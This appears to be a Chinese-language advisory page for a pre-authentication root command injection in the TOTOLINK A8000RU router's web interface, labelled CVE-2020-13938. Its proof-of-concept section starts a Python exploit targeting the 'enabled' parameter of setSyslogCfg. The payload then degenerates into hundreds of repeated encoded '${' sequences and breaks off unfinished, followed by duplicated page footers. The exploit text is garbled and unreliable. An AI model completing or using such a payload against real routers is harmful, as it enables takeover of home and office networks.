TOTOLINK A8000RU 预认证命令注入漏洞 (CVE-2020-13938)

# 漏洞概述 - **漏洞编号**: #801142 - **漏洞标题**: Totolink A8000RU 7.1cu.643_b20200521 Command Injection - **漏洞描述**: 在TOTOLINK A8000RU 7.1cu.643_b20200521路由器的web管理界面（/cgi-bin/cstecgi.cgi）的“setSyslogCfg”功能中存在一个预认证操作系统命令注入漏洞。CGI处理程序使用HTTP参数“enabled”的用户控制输入，将其嵌入到shell命令字符串中，并通过“system()”执行，没有进行任何清理或转义。因此，远程攻击者可以通过网络访问web界面注入任意shell命令，并在设备上以root权限执行，无需认证。这允许完全妥协路由器，并可能进一步妥协所连接的局域网。 # 影响范围 - **受影响设备**: TOTOLINK A8000RU 7.1cu.643_b20200521路由器 # 修复方案 - **修复状态**: 已修复（Moderation: Fixed） - **修复时间**: 2020年9月26日 10:08 PM # POC代码 ```python import requests import sys def exploit(url): # 构造payload payload = "enabled=;echo%20%27%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

TOTOLINK A8000RU 预认证命令注入漏洞 (CVE-2020-13938)

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

TOTOLINK A8000RU 预认证命令注入漏洞 (CVE-2020-13938)

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！